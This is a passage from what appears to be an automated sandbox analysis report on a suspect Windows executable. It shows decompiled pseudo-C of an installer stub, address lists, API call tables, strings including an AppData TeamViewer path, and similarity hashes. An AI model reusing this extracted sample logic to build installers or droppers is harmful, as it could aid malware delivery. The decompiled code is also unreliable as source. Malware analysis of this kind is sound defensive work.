                                                                                                                        								__cl =  *(__eax + __edx);
                                                                                                                        								__eax =  *(__ebp - 0x14);
                                                                                                                        								 *(__ebp - 0x5c) = __cl;
                                                                                                                        								 *(__eax + __edx) = __cl;
                                                                                                                        								__eax = __eax + 1;
                                                                                                                        								__edx = 0;
                                                                                                                        								_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                        								__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        								__edx = _t414;
                                                                                                                        								__eax =  *(__ebp - 0x68);
                                                                                                                        								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                        								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                        								__eflags =  *(__ebp - 0x30);
                                                                                                                        								 *( *(__ebp - 0x68)) = __cl;
                                                                                                                        								 *(__ebp - 0x14) = __edx;
                                                                                                                        								if( *(__ebp - 0x30) > 0) {
                                                                                                                        									continue;
                                                                                                                        								} else {
                                                                                                                        									goto L80;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							 *(__ebp - 0x88) = 0x1c;
                                                                                                                        							goto L170;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}













                                                                                                                        0x004063cb
                                                                                                                        0x00406347
                                                                                                                        0x0040634b
                                                                                                                        0x00406953
                                                                                                                        0x00000000
                                                                                                                        0x00406953
                                                                                                                        0x00406351
                                                                                                                        0x00406354
                                                                                                                        0x00406357
                                                                                                                        0x0040635b
                                                                                                                        0x0040635e
                                                                                                                        0x00406364
                                                                                                                        0x00406366
                                                                                                                        0x00406366
                                                                                                                        0x00406369
                                                                                                                        0x00000000
                                                                                                                        0x00406369
                                                                                                                        0x00406183
                                                                                                                        0x00406183
                                                                                                                        0x00406186
                                                                                                                        0x0040618c
                                                                                                                        0x0040618e
                                                                                                                        0x0040618e
                                                                                                                        0x00406191
                                                                                                                        0x00406194
                                                                                                                        0x00406196
                                                                                                                        0x00406197
                                                                                                                        0x0040619a
                                                                                                                        0x00406207
                                                                                                                        0x00406207
                                                                                                                        0x0040620b
                                                                                                                        0x0040620e
                                                                                                                        0x00406211
                                                                                                                        0x00406214
                                                                                                                        0x00406217
                                                                                                                        0x00406218
                                                                                                                        0x0040621b
                                                                                                                        0x0040621d
                                                                                                                        0x00406223
                                                                                                                        0x00406226
                                                                                                                        0x00406229
                                                                                                                        0x0040622c
                                                                                                                        0x0040622f
                                                                                                                        0x00406235
                                                                                                                        0x00406251
                                                                                                                        0x00406254
                                                                                                                        0x00406257
                                                                                                                        0x0040625a
                                                                                                                        0x00406261
                                                                                                                        0x00406267
                                                                                                                        0x0040626b
                                                                                                                        0x00406237
                                                                                                                        0x00406237
                                                                                                                        0x0040623b
                                                                                                                        0x00406243
                                                                                                                        0x00406248
                                                                                                                        0x0040624a
                                                                                                                        0x0040624c
                                                                                                                        0x0040624c
                                                                                                                        0x00406275
                                                                                                                        0x00406278
                                                                                                                        0x004061ef
                                                                                                                        0x004061ef
                                                                                                                        0x004061f5
                                                                                                                        0x004062a8
                                                                                                                        0x004062ae
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004062b0
                                                                                                                        0x004062b3
                                                                                                                        0x004062b6
                                                                                                                        0x004062b9
                                                                                                                        0x004062bc
                                                                                                                        0x004062bf
                                                                                                                        0x004062c2
                                                                                                                        0x004062c5
                                                                                                                        0x004062c8
                                                                                                                        0x004062ce
                                                                                                                        0x004062e6
                                                                                                                        0x004062e9
                                                                                                                        0x004062ec
                                                                                                                        0x004062ef
                                                                                                                        0x004062ef
                                                                                                                        0x004062f2
                                                                                                                        0x004062f8
                                                                                                                        0x004062d0
                                                                                                                        0x004062d0
                                                                                                                        0x004062d8
                                                                                                                        0x004062dd
                                                                                                                        0x004062df
                                                                                                                        0x004062e1
                                                                                                                        0x004062e1
                                                                                                                        0x00406302
                                                                                                                        0x00406305
                                                                                                                        0x00406283
                                                                                                                        0x00406287
                                                                                                                        0x00406947
                                                                                                                        0x00000000
                                                                                                                        0x00406947
                                                                                                                        0x0040628d
                                                                                                                        0x00406290
                                                                                                                        0x00406293
                                                                                                                        0x00406297
                                                                                                                        0x0040629a
                                                                                                                        0x004062a0
                                                                                                                        0x004062a2
                                                                                                                        0x004062a2
                                                                                                                        0x004062a5
                                                                                                                        0x004062a5
                                                                                                                        0x00406305
                                                                                                                        0x0040630c
                                                                                                                        0x0040630c
                                                                                                                        0x0040630c
                                                                                                                        0x00406310
                                                                                                                        0x00406310
                                                                                                                        0x00406313
                                                                                                                        0x00406316
                                                                                                                        0x0040631a
                                                                                                                        0x0040695f
                                                                                                                        0x00000000
                                                                                                                        0x0040695f
                                                                                                                        0x00406320
                                                                                                                        0x00406323
                                                                                                                        0x00406326
                                                                                                                        0x00406329
                                                                                                                        0x0040632c
                                                                                                                        0x0040632f
                                                                                                                        0x00406332
                                                                                                                        0x00406334
                                                                                                                        0x00406337
                                                                                                                        0x0040633a
                                                                                                                        0x0040633d
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x004064dc
                                                                                                                        0x004064dc
                                                                                                                        0x004064df
                                                                                                                        0x004064df
                                                                                                                        0x00000000
                                                                                                                        0x004064df
                                                                                                                        0x00406201
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040627e
                                                                                                                        0x004061ca
                                                                                                                        0x004061ce
                                                                                                                        0x0040693b
                                                                                                                        0x004069b7
                                                                                                                        0x004069bf
                                                                                                                        0x004069c6
                                                                                                                        0x004069c8
                                                                                                                        0x004069cf
                                                                                                                        0x004069d3
                                                                                                                        0x004069d3
                                                                                                                        0x004061d4
                                                                                                                        0x004061d7
                                                                                                                        0x004061da
                                                                                                                        0x004061de
                                                                                                                        0x004061e1
                                                                                                                        0x004061e7
                                                                                                                        0x004061e9
                                                                                                                        0x004061e9
                                                                                                                        0x004061ec
                                                                                                                        0x00000000
                                                                                                                        0x004061ec
                                                                                                                        0x00406278
                                                                                                                        0x00406181
                                                                                                                        0x00405fb5
                                                                                                                        0x00405fb5
                                                                                                                        0x00405fbe
                                                                                                                        0x004069cc
                                                                                                                        0x004069cc
                                                                                                                        0x00000000
                                                                                                                        0x004069cc
                                                                                                                        0x00405fc4
                                                                                                                        0x00000000
                                                                                                                        0x00405fcf
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fd8
                                                                                                                        0x00405fdb
                                                                                                                        0x00405fde
                                                                                                                        0x00405fe2
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fe8
                                                                                                                        0x00405feb
                                                                                                                        0x00405fed
                                                                                                                        0x00405fee
                                                                                                                        0x00405ff1
                                                                                                                        0x00405ff3
                                                                                                                        0x00405ff4
                                                                                                                        0x00405ff6
                                                                                                                        0x00405ff9
                                                                                                                        0x00405ffe
                                                                                                                        0x00406003
                                                                                                                        0x0040600c
                                                                                                                        0x0040601f
                                                                                                                        0x00406022
                                                                                                                        0x0040602e
                                                                                                                        0x00406056
                                                                                                                        0x00406058
                                                                                                                        0x00406066
                                                                                                                        0x00406066
                                                                                                                        0x0040606a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040605a
                                                                                                                        0x0040605a
                                                                                                                        0x00406574
                                                                                                                        0x0040657b
                                                                                                                        0x0040657e
                                                                                                                        0x0040658c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406862
                                                                                                                        0x00406862
                                                                                                                        0x00406865
                                                                                                                        0x0040686c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406871
                                                                                                                        0x00406871
                                                                                                                        0x00406875
                                                                                                                        0x004069ad
                                                                                                                        0x00000000
                                                                                                                        0x004069ad
                                                                                                                        0x0040687b
                                                                                                                        0x0040687e
                                                                                                                        0x00406881
                                                                                                                        0x00406885
                                                                                                                        0x00406888
                                                                                                                        0x0040688e
                                                                                                                        0x00406890
                                                                                                                        0x00406890
                                                                                                                        0x00406890
                                                                                                                        0x00406893
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406899
                                                                                                                        0x00406899
                                                                                                                        0x0040689d
                                                                                                                        0x004068fd
                                                                                                                        0x00406900
                                                                                                                        0x00406905
                                                                                                                        0x00406906
                                                                                                                        0x00406908
                                                                                                                        0x0040690a
                                                                                                                        0x0040690d
                                                                                                                        0x00000000
                                                                                                                        0x0040690d
                                                                                                                        0x0040689f
                                                                                                                        0x004068a5
                                                                                                                        0x004068a8
                                                                                                                        0x004068ab
                                                                                                                        0x004068ae
                                                                                                                        0x004068b1
                                                                                                                        0x004068b4
                                                                                                                        0x004068b7
                                                                                                                        0x004068ba
                                                                                                                        0x004068bd
                                                                                                                        0x004068c0
                                                                                                                        0x004068d9
                                                                                                                        0x004068dc
                                                                                                                        0x004068df
                                                                                                                        0x004068e2
                                                                                                                        0x004068e6
                                                                                                                        0x004068e8
                                                                                                                        0x004068e8
                                                                                                                        0x004068e9
                                                                                                                        0x004068ec
                                                                                                                        0x004068c2
                                                                                                                        0x004068c2
                                                                                                                        0x004068ca
                                                                                                                        0x004068cf
                                                                                                                        0x004068d1
                                                                                                                        0x004068d4
                                                                                                                        0x004068d4
                                                                                                                        0x004068ef
                                                                                                                        0x004068f6
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x00000000
                                                                                                                        0x00406594
                                                                                                                        0x00406597
                                                                                                                        0x004065cd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x00406700
                                                                                                                        0x00406700
                                                                                                                        0x00406703
                                                                                                                        0x00406705
                                                                                                                        0x0040698f
                                                                                                                        0x00000000
                                                                                                                        0x0040698f
                                                                                                                        0x0040670b
                                                                                                                        0x0040670e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406714
                                                                                                                        0x00406718
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x00000000
                                                                                                                        0x0040671b
                                                                                                                        0x00406599
                                                                                                                        0x0040659b
                                                                                                                        0x0040659d
                                                                                                                        0x0040659f
                                                                                                                        0x004065a2
                                                                                                                        0x004065a3
                                                                                                                        0x004065a5
                                                                                                                        0x004065a7
                                                                                                                        0x004065aa
                                                                                                                        0x004065ad
                                                                                                                        0x004065c3
                                                                                                                        0x004065c8
                                                                                                                        0x00406600
                                                                                                                        0x00406600
                                                                                                                        0x00406604
                                                                                                                        0x00406630
                                                                                                                        0x00406632
                                                                                                                        0x00406639
                                                                                                                        0x0040663c
                                                                                                                        0x0040663f
                                                                                                                        0x0040663f
                                                                                                                        0x00406644
                                                                                                                        0x00406644
                                                                                                                        0x00406646
                                                                                                                        0x00406649
                                                                                                                        0x00406650
                                                                                                                        0x00406653
                                                                                                                        0x00406680
                                                                                                                        0x00406680
                                                                                                                        0x00406683
                                                                                                                        0x00406686
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x00000000
                                                                                                                        0x004066fa
                                                                                                                        0x00406688
                                                                                                                        0x0040668e
                                                                                                                        0x00406691
                                                                                                                        0x00406694
                                                                                                                        0x00406697
                                                                                                                        0x0040669a
                                                                                                                        0x0040669d
                                                                                                                        0x004066a0
                                                                                                                        0x004066a3
                                                                                                                        0x004066a6
                                                                                                                        0x004066a9
                                                                                                                        0x004066c2
                                                                                                                        0x004066c4
                                                                                                                        0x004066c7
                                                                                                                        0x004066c8
                                                                                                                        0x004066cb
                                                                                                                        0x004066cd
                                                                                                                        0x004066d0
                                                                                                                        0x004066d2
                                                                                                                        0x004066d4
                                                                                                                        0x004066d7
                                                                                                                        0x004066d9
                                                                                                                        0x004066dc
                                                                                                                        0x004066e0
                                                                                                                        0x004066e2
                                                                                                                        0x004066e2
                                                                                                                        0x004066e3
                                                                                                                        0x004066e6
                                                                                                                        0x004066e9
                                                                                                                        0x004066ab
                                                                                                                        0x004066ab
                                                                                                                        0x004066b3
                                                                                                                        0x004066b8
                                                                                                                        0x004066ba
                                                                                                                        0x004066bd
                                                                                                                        0x004066bd
                                                                                                                        0x004066ec
                                                                                                                        0x004066f3
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x004066f3
                                                                                                                        0x00406606
                                                                                                                        0x00406609
                                                                                                                        0x0040660b
                                                                                                                        0x0040660e
                                                                                                                        0x00406611
                                                                                                                        0x00406614
                                                                                                                        0x00406616
                                                                                                                        0x00406619
                                                                                                                        0x0040661c
                                                                                                                        0x0040661c
                                                                                                                        0x0040661f
                                                                                                                        0x0040661f
                                                                                                                        0x00406622
                                                                                                                        0x00406629
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00406629
                                                                                                                        0x004065af
                                                                                                                        0x004065b2
                                                                                                                        0x004065b4
                                                                                                                        0x004065b7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                                                        • Instruction ID: 7fe690cacb8e5da35aefc448adc87e2f65dc6f56ff44dc44b78e187fa59068bd
                                                                                                                        • Opcode Fuzzy Hash: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                                                        • Instruction Fuzzy Hash: 70F16871D00229CBDF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00405E88(signed int _a4) {
                                                                                                                        				struct HINSTANCE__* _t5;
                                                                                                                        				CHAR* _t7;
                                                                                                                        				signed int _t9;
                                                                                                                        
                                                                                                                        				_t9 = _a4 << 3;
                                                                                                                        				_t7 =  *(_t9 + 0x409220);
                                                                                                                        				_t5 = GetModuleHandleA(_t7);
                                                                                                                        				if(_t5 != 0) {
                                                                                                                        					L2:
                                                                                                                        					return GetProcAddress(_t5,  *(_t9 + 0x409224));
                                                                                                                        				}
                                                                                                                        				_t5 = LoadLibraryA(_t7); // executed
                                                                                                                        				if(_t5 != 0) {
                                                                                                                        					goto L2;
                                                                                                                        				}
                                                                                                                        				return _t5;
                                                                                                                        			}







                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 310444273-0
                                                                                                                        • Opcode ID: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                                                        • Instruction ID: 91087f9554edebef2dfdad95906e97f440013226b38390424b9c6ad62026e406
                                                                                                                        • Opcode Fuzzy Hash: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                                                        • Instruction Fuzzy Hash: 0FE08C32A08511BBD3115B30ED0896B77A8EA89B41304083EF959F6290D734EC119BFA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E004036AF() {
                                                                                                                        				intOrPtr _v12;
                                                                                                                        				intOrPtr _v16;
                                                                                                                        				int _v20;
                                                                                                                        				int _v24;
                                                                                                                        				char _v28;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				intOrPtr* _t20;
                                                                                                                        				void* _t27;
                                                                                                                        				int _t30;
                                                                                                                        				void* _t33;
                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                        				int _t37;
                                                                                                                        				int _t41;
                                                                                                                        				char* _t61;
                                                                                                                        				CHAR* _t73;
                                                                                                                        				intOrPtr _t75;
                                                                                                                        				CHAR* _t80;
                                                                                                                        
                                                                                                                        				_t75 =  *0x423eb0;
                                                                                                                        				_t20 = E00405E88(6);
                                                                                                                        				_t82 = _t20;
                                                                                                                        				if(_t20 == 0) {
                                                                                                                        					_t73 = 0x4204a0;
                                                                                                                        					"1033" = 0x7830;
                                                                                                                        					E00405A4D(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x4204a0, 0);
                                                                                                                        					__eflags =  *0x4204a0;
                                                                                                                        					if(__eflags == 0) {
                                                                                                                        						E00405A4D(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x4204a0, 0);
                                                                                                                        					}
                                                                                                                        					_push(_t73);
                                                                                                                        					_push("1033");
                                                                                                                        					L00405B82();
                                                                                                                        				} else {
                                                                                                                        					E00405AC4("1033",  *_t20() & 0x0000ffff);
                                                                                                                        				}
                                                                                                                        				E00403978(_t70, _t82);
                                                                                                                        				 *0x423f20 =  *0x423eb8 & 0x00000020;
                                                                                                                        				 *0x423f3c = 0x10000;
                                                                                                                        				if(E0040573A(_t82, 0x429400) != 0) {
                                                                                                                        					L16:
                                                                                                                        					if(E0040573A(_t90, 0x429400) == 0) {
                                                                                                                        						E00405B88(0, _t73, _t75, 0x429400,  *((intOrPtr*)(_t75 + 0x118)));
                                                                                                                        					}
                                                                                                                        					_t27 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                                                        					 *0x423688 = _t27;
                                                                                                                        					if( *((intOrPtr*)(_t75 + 0x50)) == 0xffffffff) {
                                                                                                                        						L21:
                                                                                                                        						if(E0040140B(0) == 0) {
                                                                                                                        							E00403978(_t70, __eflags);
                                                                                                                        							__eflags =  *0x423f40;
                                                                                                                        							if( *0x423f40 != 0) {
                                                                                                                        								_push(0);
                                                                                                                        								_t30 = E00404FD6();
                                                                                                                        								__eflags = _t30;
                                                                                                                        								if(_t30 == 0) {
                                                                                                                        									E0040140B(1);
                                                                                                                        									goto L33;
                                                                                                                        								}
                                                                                                                        								__eflags =  *0x42366c;
                                                                                                                        								if( *0x42366c == 0) {
                                                                                                                        									E0040140B(2);
                                                                                                                        								}
                                                                                                                        								goto L22;
                                                                                                                        							}
                                                                                                                        							ShowWindow( *0x420478, 5);
                                                                                                                        							_t36 = LoadLibraryA("RichEd20");
                                                                                                                        							__eflags = _t36;
                                                                                                                        							if(_t36 == 0) {
                                                                                                                        								LoadLibraryA("RichEd32");
                                                                                                                        							}
                                                                                                                        							_t80 = "RichEdit20A";
                                                                                                                        							_t37 = GetClassInfoA(0, _t80, 0x423640);
                                                                                                                        							__eflags = _t37;
                                                                                                                        							if(_t37 == 0) {
                                                                                                                        								GetClassInfoA(0, "RichEdit", 0x423640);
                                                                                                                        								 *0x423664 = _t80;
                                                                                                                        								RegisterClassA(0x423640);
                                                                                                                        							}
                                                                                                                        							_t41 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403A45, 0);
                                                                                                                        							E004035FF(E0040140B(5), 1);
                                                                                                                        							return _t41;
                                                                                                                        						}
                                                                                                                        						L22:
                                                                                                                        						_t33 = 2;
                                                                                                                        						return _t33;
                                                                                                                        					} else {
                                                                                                                        						_t70 =  *0x423ea0;
                                                                                                                        						 *0x423654 = _t27;
                                                                                                                        						_v28 = 0x624e5f;
                                                                                                                        						 *0x423644 = E00401000;
                                                                                                                        						 *0x423650 =  *0x423ea0;
                                                                                                                        						 *0x423664 =  &_v28;
                                                                                                                        						if(RegisterClassA(0x423640) == 0) {
                                                                                                                        							L33:
                                                                                                                        							__eflags = 0;
                                                                                                                        							return 0;
                                                                                                                        						}
                                                                                                                        						_t12 =  &_v24; // 0x624e5f
                                                                                                                        						SystemParametersInfoA(0x30, 0, _t12, 0);
                                                                                                                        						 *0x420478 = CreateWindowExA(0x80,  &_v28, 0, 0x80000000, _v24, _v20, _v16 - _v24, _v12 - _v20, 0, 0,  *0x423ea0, 0);
                                                                                                                        						goto L21;
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					_t70 =  *(_t75 + 0x48);
                                                                                                                        					if(_t70 == 0) {
                                                                                                                        						goto L16;
                                                                                                                        					}
                                                                                                                        					_t73 = 0x422e40;
                                                                                                                        					E00405A4D( *((intOrPtr*)(_t75 + 0x44)), _t70,  *((intOrPtr*)(_t75 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
                                                                                                                        					_t61 =  *0x422e40; // 0x20
                                                                                                                        					if(_t61 == 0) {
                                                                                                                        						goto L16;
                                                                                                                        					}
                                                                                                                        					if(_t61 == 0x22) {
                                                                                                                        						_t73 = 0x422e41;
                                                                                                                        						_t61 = E00405684(0x422e41, 0x22);
                                                                                                                        						 *_t61 = 0;
                                                                                                                        					}
                                                                                                                        					_push(_t73);
                                                                                                                        					L00405B7C();
                                                                                                                        					_t62 = _t61 + _t73 - 4;
                                                                                                                        					if(_t62 <= _t73) {
                                                                                                                        						L15:
                                                                                                                        						E00405B66(0x429400, E00405659(_t62, _t73));
                                                                                                                        						goto L16;
                                                                                                                        					} else {
                                                                                                                        						_push(".exe");
                                                                                                                        						_push(_t62);
                                                                                                                        						if( *0x4070f0() != 0) {
                                                                                                                        							goto L15;
                                                                                                                        						}
                                                                                                                        						_t62 = GetFileAttributesA(_t73);
                                                                                                                        						if(_t62 == 0xffffffff) {
                                                                                                                        							L14:
                                                                                                                        							_t62 = E004056A0(_t62, _t73);
                                                                                                                        							goto L15;
                                                                                                                        						}
                                                                                                                        						_t90 = _t62 & 0x00000010;
                                                                                                                        						if((_t62 & 0x00000010) != 0) {
                                                                                                                        							goto L15;
                                                                                                                        						}
                                                                                                                        						goto L14;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}























                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                                          • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                                          • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                                        • lstrcat.KERNEL32(1033,004204A0), ref: 00403720
                                                                                                                        • lstrlen.KERNEL32( "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe",?,?,?, "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe",00000000,00429400,1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,"C:\Users\user\Desktop\77Etc0bR2v.exe" ), ref: 00403795
                                                                                                                        • lstrcmpi.KERNEL32 ref: 004037A8
                                                                                                                        • GetFileAttributesA.KERNEL32( "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe"), ref: 004037B3
                                                                                                                        • LoadImageA.USER32 ref: 004037FC
                                                                                                                          • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                                                        • RegisterClassA.USER32 ref: 00403843
                                                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040385B
                                                                                                                        • CreateWindowExA.USER32 ref: 00403894
                                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 004038CA
                                                                                                                        • LoadLibraryA.KERNEL32(RichEd20), ref: 004038DB
                                                                                                                        • LoadLibraryA.KERNEL32(RichEd32), ref: 004038E6
                                                                                                                        • GetClassInfoA.USER32 ref: 004038F6
                                                                                                                        • GetClassInfoA.USER32 ref: 00403903
                                                                                                                        • RegisterClassA.USER32 ref: 0040390C
                                                                                                                        • DialogBoxParamA.USER32 ref: 0040392B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                        • String ID: "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe"$"C:\Users\user\Desktop\77Etc0bR2v.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                        • API String ID: 914957316-2836006257
                                                                                                                        • Opcode ID: 1f1367b372de5d4c513f4d159d02d8cf4d09cbf7b54f42e698bf1387707a820a
                                                                                                                        • Instruction ID: 5edcd83abe1923a5ef33726047749e404321c8c293ca1ea02831498dc8d0bb6f
                                                                                                                        • Opcode Fuzzy Hash: 1f1367b372de5d4c513f4d159d02d8cf4d09cbf7b54f42e698bf1387707a820a
                                                                                                                        • Instruction Fuzzy Hash: A961A3B16442007FD720AF659D45E2B3AADEB4475AF40457FF940B22E1D77CAD01CA2E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 96%
                                                                                                                        			E00402C72(void* __eflags, signed int _a4) {
                                                                                                                        				long _v8;
                                                                                                                        				long _v12;
                                                                                                                        				intOrPtr _v16;
                                                                                                                        				long _v20;
                                                                                                                        				intOrPtr _v24;
                                                                                                                        				intOrPtr _v28;
                                                                                                                        				intOrPtr _v32;
                                                                                                                        				intOrPtr _v36;
                                                                                                                        				signed int _v40;
                                                                                                                        				char _v300;
                                                                                                                        				long _t54;
                                                                                                                        				void* _t62;
                                                                                                                        				intOrPtr _t65;
                                                                                                                        				void* _t68;
                                                                                                                        				intOrPtr* _t70;
                                                                                                                        				intOrPtr _t71;
                                                                                                                        				long _t82;
                                                                                                                        				void* _t83;
                                                                                                                        				signed int _t89;
                                                                                                                        				intOrPtr _t92;
                                                                                                                        				void* _t101;
                                                                                                                        				signed int _t103;
                                                                                                                        				void* _t105;
                                                                                                                        				long _t106;
                                                                                                                        				long _t109;
                                                                                                                        				intOrPtr* _t110;
                                                                                                                        
                                                                                                                        				_v8 = 0;
                                                                                                                        				_v12 = 0;
                                                                                                                        				 *0x423eac = GetTickCount() + 0x3e8;
                                                                                                                        				GetModuleFileNameA(0, "C:\\Users\\engineer\\Desktop\\77Etc0bR2v.exe", 0x400);
                                                                                                                        				_t105 = E0040583D("C:\\Users\\engineer\\Desktop\\77Etc0bR2v.exe", 0x80000000, 3);
                                                                                                                        				 *0x409014 = _t105;
                                                                                                                        				if(_t105 == 0xffffffff) {
                                                                                                                        					return "Error launching installer";
                                                                                                                        				}
                                                                                                                        				E00405B66(0x42b000, E004056A0(E00405B66("C:\\Users\\engineer\\Desktop", "C:\\Users\\engineer\\Desktop\\77Etc0bR2v.exe"), "C:\\Users\\engineer\\Desktop"));
                                                                                                                        				_t54 = GetFileSize(_t105, 0);
                                                                                                                        				 *0x41f050 = _t54;
                                                                                                                        				_t109 = _t54;
                                                                                                                        				if(_t54 <= 0) {
                                                                                                                        					L22:
